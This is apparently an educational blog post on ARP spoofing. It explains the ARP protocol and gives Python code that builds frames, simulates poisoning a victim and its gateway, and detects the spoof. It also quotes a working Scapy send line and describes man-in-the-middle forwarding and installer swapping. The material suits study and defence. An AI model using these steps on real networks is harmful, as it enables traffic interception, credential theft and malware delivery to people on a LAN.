In today's post I would like to talk about security in relation to networking, specifically an intriguing attack vector in ARP, the address resolution protocol used on LANs.
Before reading this article I strongly suggest you read the networking article we had a long journey with:
In this article we're going to do some Python scripting and meet the ARP protocol and the Scapy library, so without further ado let's get into it 🙂
How does a normal LAN work
When a computer wants to open a connection to another computer inside the LAN, it usually only has that machine's IP address.
But to actually put a frame on the wire to another computer in our LAN, we also need that computer's MAC address.
So if we only have the IP, how do we get the MAC? Hello ARP 🙂
ARP (Address Resolution Protocol) is a very simple protocol: it lets us broadcast the following request to every endpoint in our LAN: "Whoever has the IP x.x.x.x, please send me your MAC address".
So whenever you want to open a connection, you first need the target machine's MAC address, as said above.
ARP to the rescue!
Each time an endpoint asks the LAN for a MAC address and gets a response back, it stores the answer (the IP and MAC pair) in its ARP table.
The ARP table, as you may already have guessed, is a cache that makes communication faster: when a new packet needs to be sent, the endpoint first looks in its ARP table, and if the IP is already there it sends directly to the cached MAC instead of going through the request/reply flow described above.
So the ARP table caches previous requests/responses and speeds up communication.
This feature of ARP is pretty useful, but it also has a troublesome side, which we will discuss later 🙂
How does ARP do what it does?
ARP is stateless: whatever it receives it acts on, without any regard for previous messages or for any notion of a "conversation" of ARP messages.
In other words, there is no state machine that tracks or checks the flow of messages (for example, whether a reply answers a request we actually sent); when something arrives, it is handled anyway.
When ARP needs the MAC address for an IP, it sends an ARP request message as a broadcast on the LAN, asking for the MAC that belongs to that IP. In Wireshark it looks like this:
In this example we ask the endpoint that has the IP 172.20.13.122 to send its MAC address back to 172.20.0.31, which is us.
When the endpoint with the IP 172.20.13.122 receives our request, it responds with an ARP reply message that carries its MAC address.
The reply is just as simple. It "links" the IP address queried in the original ARP request to the MAC address of the station that responded, and it looks like this:
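To make the request and reply concrete without Wireshark, here is an added example (not code from the original post) that builds and parses the raw Ethernet/ARP frames in pure Python with `struct`. It uses the IPs from the screenshots above; the two MAC addresses are constructed for the example. The only things that differ between "who-has" and "is-at" are the opcode (1 vs 2), the Ethernet destination (broadcast vs unicast) and which side fills in the target MAC.

```python
"""Build and parse Ethernet/ARP frames by hand (added example, pure Python)."""
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REQUEST = 1             # "who-has"
ARP_REPLY = 2               # "is-at"
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str,
              target_mac: str, target_ip: str) -> bytes:
    """Return a 42-byte Ethernet + ARP frame (no padding, no FCS)."""
    # A request is broadcast; a reply goes straight to the asker's MAC.
    eth_dst = BROADCAST_MAC if op == ARP_REQUEST else target_mac
    eth = mac_to_bytes(eth_dst) + mac_to_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
    arp += mac_to_bytes(target_mac) + ip_to_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode the frame; raises ValueError if it is not an Ethernet/IPv4 ARP frame."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    (eth_type,) = struct.unpack("!H", frame[12:14])
    if eth_type != ETH_P_ARP:
        raise ValueError(f"not an ARP frame: ethertype 0x{eth_type:04x}")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported hardware/protocol type")
    body = frame[22:42]
    return {
        "op": op,
        "sender_mac": bytes_to_mac(body[0:6]),
        "sender_ip": bytes_to_ip(body[6:10]),
        "target_mac": bytes_to_mac(body[10:16]),
        "target_ip": bytes_to_ip(body[16:20]),
    }


def who_has(asker_mac: str, asker_ip: str, wanted_ip: str) -> bytes:
    """ARP request: the target MAC is unknown, so it is sent as all zeros."""
    return build_arp(ARP_REQUEST, asker_mac, asker_ip, ZERO_MAC, wanted_ip)


def is_at(responder_mac: str, responder_ip: str, asker_mac: str, asker_ip: str) -> bytes:
    """ARP reply: the responder fills in its own MAC as the sender hardware address."""
    return build_arp(ARP_REPLY, responder_mac, responder_ip, asker_mac, asker_ip)


if __name__ == "__main__":
    OUR_MAC = "02:00:00:aa:bb:01"     # constructed for the example
    THEIR_MAC = "02:00:00:aa:bb:02"   # constructed for the example
    req = who_has(OUR_MAC, "172.20.0.31", "172.20.13.122")
    rep = is_at(THEIR_MAC, "172.20.13.122", OUR_MAC, "172.20.0.31")
    print("request:", parse_arp(req))
    print("reply:  ", parse_arp(rep))
```

Note that nothing in the reply ties it to the request: the parser (and a real ARP implementation) has no way to tell from the frame alone whether a matching "who-has" was ever sent, which is exactly the property the next section exploits.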
The beautiful part, which we mentioned only briefly, is that ARP is a stateless protocol.
Hmmm... so what if we send an ARP reply without any ARP request in the first place?
Will it change the ARP table of the receiving station, so that the IP named in our reply now maps to the MAC address we supplied?
Yes, it will.
If we send a station an ARP reply that maps the IP of a real machine X to the MAC address of our station Y, all traffic that station sends to X will instead go to Y, which is simply us.
Isn't that great? LOL just kidding 🙂
As you can see, it's pretty simple to fool endpoints into changing the MAC address in their ARP table.
So you might be wondering: why hasn't anyone replaced ARP with a new protocol, or added some kind of security mechanism to it?
That's a great question, and the simple answer is that ARP delivers the functionality that is needed and does it well.
The attack also requires an attacker who is already on the LAN, and getting there is not impossible, but it is a fair amount of work: there are firewalls to get past or a business building to get into, so the LAN is still commonly treated as a trusted zone.
There are mitigations, though. Hosts can use static ARP entries that replies cannot overwrite, and managed switches can enforce Dynamic ARP Inspection (DAI), which drops ARP replies whose IP/MAC pair does not match what the switch learned through DHCP snooping; neither is on by default in a typical home LAN.
So how can we mess with ARP for fun?
Well, now that we've found out what ARP does, what can we do with it?
The options are almost endless, because today your computer, IPTV, mobile phone or anything else sitting in your LAN is not safe from ARP poisoning.
Imagine, for example, that we tell a mobile phone that the router of our home LAN is actually our PC.
Once we do that, all the traffic the phone should have sent to the router is sent to our PC instead.
Interesting... but what happens to that traffic?
Well, if you do not forward it, it is simply dropped at our PC, and the mobile phone user quickly notices that something is wrong, because the internet stops working.
So if you want the attacked endpoint to feel like everything is fine, you tell your PC to forward the data on to the real router (on Linux by enabling IP forwarding, net.ipv4.ip_forward=1), so the mobile phone user keeps browsing as usual while you act as a man in the middle who sees everything the phone sends. To see the replies as well, you poison the router in the same way, telling it that the phone's IP is at your MAC.
Because our PC forwards the traffic, from the phone's point of view its packets still go to the gateway's IP; only the MAC address in its ARP table changed, so it looks like normal access to the network router or whatever gateway provides the local network resources. Cool, right? 😉
Further use cases
Imagine that you want to download a file from some website, for example the WhatsApp desktop application.
What if an attacker in your LAN has ARP spoofed you? When you send a plain HTTP request to download the installer, the attacker receives the response on its way back and can replace the download URL (or the file itself) that WhatsApp served with one pointing at a file of his own. Over HTTPS this tampering would break the TLS connection and produce a certificate error, unless the user clicks through it.
Let's say the file we actually downloaded has a nice WhatsApp icon but is in fact malware, and we don't have antivirus installed on our PC.
What do you think will happen when we execute that installer?
Great question, and the gruesome truth is that anything could happen.
The attacker could have written:
- Ransomware: encrypts our entire PC and demands money.
- Keylogger: records our keyboard input and, worse, which websites we visit, so when we log in to our bank account and he recognizes that, he can simply steal our banking credentials.
Of course there are many more examples, but these are some famous ones.
A fun and short example
In Python we have a cool project called Scapy.
Scapy is a simple interface for building, sending and sniffing network packets, and it gives access to every field of the data it sends or receives.
In this example we build an ARP reply packet with Scapy.
Variables explanation:
- op: tells Scapy which ARP packet type to build. Its value here is 2, so we build an ARP reply (1 would be a request).
- pdst: the IP of the attacked endpoint.
- hwdst: the MAC address of the attacked endpoint.
- psrc: the IP we want to impersonate, i.e. the IP that the attacked machine will now reach us at.
You might be asking... where is the MAC address that we fool the attacked machine with?
Scapy takes care of that for us. When the packet is built it fills in another field, hwsrc, with the MAC address of the sending PC (the attacker) by default.
This way Scapy tells the attacked endpoint that the attacker's MAC address is where the spoofed IP (the psrc field) lives.
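The following is an added example, not the post's Scapy one-liner, and it does not need Scapy or root to run: it models the victim's ARP cache as the stateless receiver described above, generates the pair of spoofed replies needed for the router-in-the-middle scenario from the previous section (one to the phone, one to the router), and runs a small passive detector of the kind arpwatch-style tools implement. The `ArpReply` fields deliberately use Scapy's names (op, psrc, hwsrc, pdst, hwdst) so the mapping to the real packet is obvious; all IPs and MACs are constructed for the example.

```python
"""Simulated ARP poisoning of a victim and its gateway, plus detection (added example)."""
from dataclasses import dataclass, field

# Constructed addresses for the demo (not from the original post).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "02:00:00:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "02:00:00:00:00:20"
ATTACKER_MAC = "02:00:00:00:00:66"


@dataclass(frozen=True)
class ArpReply:
    """Field names mirror Scapy's ARP layer; op=2 means 'is-at'."""
    op: int
    psrc: str   # IP the reply claims to speak for
    hwsrc: str  # MAC it claims that IP lives at (Scapy fills this with our MAC by default)
    pdst: str   # IP of the host the reply is addressed to
    hwdst: str  # MAC of the host the reply is addressed to


@dataclass
class ArpCache:
    """Simplified stateless receiver: a reply addressed to us overwrites the mapping,
    with no check that we ever sent a matching request."""
    owner_ip: str
    table: dict = field(default_factory=dict)

    def handle(self, pkt: ArpReply) -> None:
        if pkt.op == 2 and pkt.pdst == self.owner_ip:
            self.table[pkt.psrc] = pkt.hwsrc

    def resolve(self, ip: str):
        return self.table.get(ip)


def poison_pair(attacker_mac: str, victim_ip: str, victim_mac: str,
                gateway_ip: str, gateway_mac: str):
    """The two replies a man in the middle sends: the victim learns 'gateway is at
    attacker', the gateway learns 'victim is at attacker', so both directions pass us.
    Scapy equivalent of the first one (real Scapy API, not executed here):
        send(ARP(op=2, psrc=gateway_ip, pdst=victim_ip, hwdst=victim_mac))
    """
    to_victim = ArpReply(2, psrc=gateway_ip, hwsrc=attacker_mac, pdst=victim_ip, hwdst=victim_mac)
    to_gateway = ArpReply(2, psrc=victim_ip, hwsrc=attacker_mac, pdst=gateway_ip, hwdst=gateway_mac)
    return to_victim, to_gateway


class ArpWatch:
    """Passive detector: flags an IP whose MAC changes and a MAC that claims more
    than one IP, the two signals a poisoning run leaves on the wire."""

    def __init__(self):
        self.ip_to_mac = {}
        self.alerts = []

    def observe(self, pkt: ArpReply) -> None:
        if pkt.op != 2:
            return
        prev = self.ip_to_mac.get(pkt.psrc)
        if prev is not None and prev != pkt.hwsrc:
            self.alerts.append(f"{pkt.psrc} moved from {prev} to {pkt.hwsrc}")
        self.ip_to_mac[pkt.psrc] = pkt.hwsrc
        claimed = sorted(ip for ip, mac in self.ip_to_mac.items() if mac == pkt.hwsrc)
        if len(claimed) > 1:
            self.alerts.append(f"{pkt.hwsrc} claims {', '.join(claimed)}")


def demo():
    """Poison both sides; return what each now resolves plus the detector's alerts."""
    victim = ArpCache(VICTIM_IP, {GATEWAY_IP: GATEWAY_MAC})
    gateway = ArpCache(GATEWAY_IP, {VICTIM_IP: VICTIM_MAC})
    watch = ArpWatch()
    # A legitimate reply seen earlier, so the detector knows the real gateway MAC.
    watch.observe(ArpReply(2, GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC))
    for pkt in poison_pair(ATTACKER_MAC, VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC):
        victim.handle(pkt)
        gateway.handle(pkt)
        watch.observe(pkt)
    return victim.resolve(GATEWAY_IP), gateway.resolve(VICTIM_IP), watch.alerts


if __name__ == "__main__":
    victim_view, gateway_view, alerts = demo()
    print("victim thinks gateway is at:", victim_view)
    print("gateway thinks victim is at:", gateway_view)
    for line in alerts:
        print("ALERT:", line)
```

In a real run the spoofed replies have to be resent every few seconds, because the real gateway keeps answering the victim's own ARP requests and would win the cache back; and when you are done you send the correct mappings once more so the two hosts are not left unable to talk to each other.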
Conclusion
Some defences against ARP spoofing do exist in operating systems, switches and monitoring tools, so in a well-managed network the attack is not always as easy to pull off as it sounds here; don't think that after learning how to implement it we're now the hacker of the day 🙂
Moreover, one main thing I wanted to show is that security breaches might sound very complex or impossible, but they often aren't that hard.
Because once you understand what is going on under the hood, you can do very cool things, or not very nice ones, depending on how you use those skills.
So we saw how to do a simple attack in one simple line, which is cool, but more importantly it gives us the understanding that many more attacks are easy to execute. It all depends on how well you understand the flow of the thing you want to crack, because then you are the master of the game 🙂
Now, I do hope you use this knowledge only for learning, to enhance your knowledge in the field of network security, and not for bad reasons.
Just adding a disclaimer: I'm not responsible for how you use the knowledge in this article.
As always, I hope you enjoyed reading this piece, and if you have any suggestions to improve this article so everyone else will enjoy it and have a better experience, I'll be very glad to hear them 🙂
Thank you again and have a great day!